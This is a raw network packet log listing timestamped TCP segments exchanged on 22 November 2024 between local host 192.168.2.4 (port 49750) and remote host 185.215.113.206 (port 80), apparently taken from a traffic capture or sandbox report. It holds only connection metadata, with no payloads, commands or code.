Nov 22, 2024 20:35:27.554056883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.554099083 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.554225922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.554277897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.554286003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.554322004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.555037022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.555088997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.555136919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.555180073 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.556001902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.556037903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.556055069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.556071043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.556946993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.557003975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.557027102 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.557069063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.557859898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.557909966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.558000088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.558056116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.558778048 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.558829069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.558971882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.559020042 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.559731007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.559783936 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.559834003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.559879065 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.560656071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.560702085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.560760021 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.560806036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.561616898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.561671019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.561700106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.561742067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.562609911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.562660933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.562693119 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.562731981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.563484907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.563534975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.563541889 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.563570023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.564512014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.564563036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.564590931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.564651966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.565355062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.565406084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.565469027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.565516949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.566284895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.566334009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.566385984 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.566432953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.567209959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.567260981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.567318916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.567365885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.568209887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.568263054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.568309069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.568353891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.569098949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.569153070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.569205046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.569250107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.570046902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.570097923 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.570141077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.570184946 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.570977926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.571026087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.571085930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.571134090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.571896076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.571943045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.571995974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.572040081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.572880030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.572930098 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.572972059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.573014975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.573843956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.573893070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.573980093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.574028969 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.574840069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.574898005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.574935913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.575001001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.575706959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.575756073 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.575762987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.575792074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.576673985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.576728106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.576832056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.576879025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.577573061 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.577652931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.577713013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.577748060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.607352018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.607404947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.607408047 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.607446909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.607666969 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.607717991 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.607748985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.607781887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.608649969 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.608709097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.608751059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.608788013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.609540939 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.609589100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.609646082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.609683990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.610517025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.610563040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.610563040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.610595942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.611428022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.611468077 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.611500978 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.611536980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.612409115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.612449884 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.612757921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.612802029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.613291025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.613337994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.613578081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.613620996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.614298105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.614352942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.614388943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.614425898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.615195990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.615287066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.615299940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.615345955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.616172075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.616206884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.616229057 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.616238117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.617074966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.617126942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.617168903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.617218018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.617999077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.618048906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.618104935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.618158102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.618943930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.618990898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.619051933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.619091988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.619925022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.619975090 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.620070934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.620124102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.621197939 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.621243000 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.621273041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.621310949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.621797085 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.621848106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.621876955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.621918917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.622708082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.622767925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.622793913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.622840881 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.623667955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.623730898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.623785019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.623869896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.624577045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.624630928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.624682903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.624731064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.625514030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.625590086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.625610113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.625642061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.626477957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.626518011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.626557112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.626621962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.627402067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.627454996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.627549887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.627594948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.628339052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.628386974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.628452063 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.628493071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.629292965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.629350901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.629380941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.629429102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.630228996 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.630290985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.630322933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.630362034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.631165028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.631213903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.631217003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.631248951 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.745722055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.745769024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.745850086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.745899916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.745901108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.745943069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.746026993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.746072054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.746872902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.746917963 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.746948957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.746994019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.747740030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.747786045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.747857094 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.747903109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.748740911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.748790026 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.748809099 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.748853922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.749623060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.749675989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.749684095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.749730110 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.750550985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.750602961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.750660896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.750705004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.751665115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.751717091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.751753092 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.751799107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.752449036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.752501965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.752510071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.752548933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.753437042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.753487110 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.753598928 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.753644943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.754333019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.754384995 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.754451990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.754497051 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.755292892 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.755345106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.755425930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.755474091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.756212950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.756264925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.756342888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.756385088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.757177114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.757225990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.757241011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.757287979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.758119106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.758173943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.758241892 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.758284092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.759042978 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.759069920 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.759094000 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.759116888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.760096073 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.760148048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.760190010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.760234118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.760905981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.760952950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.761020899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.761065006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.761873960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.761925936 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.761975050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.762023926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.762876034 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.762932062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.762964964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.763006926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.763735056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.763783932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.763842106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.763885021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.764667988 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.764722109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.764756918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.764796019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.765588999 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.765636921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.765681028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.765701056 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.766566038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.766633987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.766701937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.766752005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.767524004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.767582893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.768270016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.768318892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.768537045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.768584013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.768615961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.768659115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.769495964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.769546986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.769752979 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.769792080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.799261093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.799307108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.799328089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.799345970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.799518108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.799561977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.799628973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.799669027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.800358057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.800396919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.800473928 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.800513983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.801450014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.801496983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.801539898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.801579952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.802225113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.802278042 CET	49750	80	192.168.2.4	185.215.113.206
